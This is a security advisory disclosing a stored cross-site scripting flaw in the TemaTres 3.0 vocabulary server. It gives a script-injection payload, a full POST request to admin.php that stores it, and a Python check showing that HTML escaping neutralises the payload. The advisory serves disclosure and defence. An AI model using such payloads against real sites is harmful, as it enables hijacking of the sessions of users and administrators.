TemaTres: controlled vocabulary server 3.0 — Stored Cross-site scripting
Description: Web application for the management of formal representations of knowledge, thesauri, taxonomies and multilingual vocabularies.
References: https://sourceforge.net/p/tematres/mailman/tematres-help/
https://github.com/tematres/TemaTres-Vocabulary-Server/commits/master
Proof Of Concept
PAYLOAD: "><script>alert("XSS")<%2fscript>
POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
Upgrade-Insecure-Requests: 1

doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(1)%3c%2fscript%3edx6e1&alias=ACX&orden=2
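The leading `">` in the payload indicates that the stored `value` is echoed back inside a double-quoted HTML attribute. The check below is an added example (not TemaTres code and not part of the original advisory): it decodes the form body from the request above, renders it both raw and HTML-escaped, and parses the result to show which tags a browser would see. Assumptions: the sink is modelled as a hypothetical `<input value="...">` field, and all function names are made up for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Form body copied from the request above.
BODY = ("doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(1)"
        "%3c%2fscript%3edx6e1&alias=ACX&orden=2")


class TagAudit(HTMLParser):
    """Records every start tag and the value attribute of any <input>."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def stored_value(body):
    """URL-decode the form body and return the string the server receives."""
    return parse_qs(body, keep_blank_values=True)["value"][0]


def render_unsafe(value):
    # Assumed sink: the stored string is concatenated into the attribute as-is.
    return '<input type="text" name="value" value="' + value + '">'


def render_escaped(value):
    # Output encoding: & < > " ' become entities, so the quote cannot close
    # the attribute (PHP's htmlspecialchars with ENT_QUOTES does the same).
    return ('<input type="text" name="value" value="'
            + html.escape(value, quote=True) + '">')


def audit(markup):
    """Return (start tags seen, <input> value attributes seen)."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_values


if __name__ == "__main__":
    value = stored_value(BODY)
    print("unsafe :", audit(render_unsafe(value)))
    print("escaped:", audit(render_escaped(value)))
```

In the raw rendering the attribute ends at `12vlpcv` and a separate `script` element follows; in the escaped rendering the parser sees only the `input` tag, with the full stored string as its value.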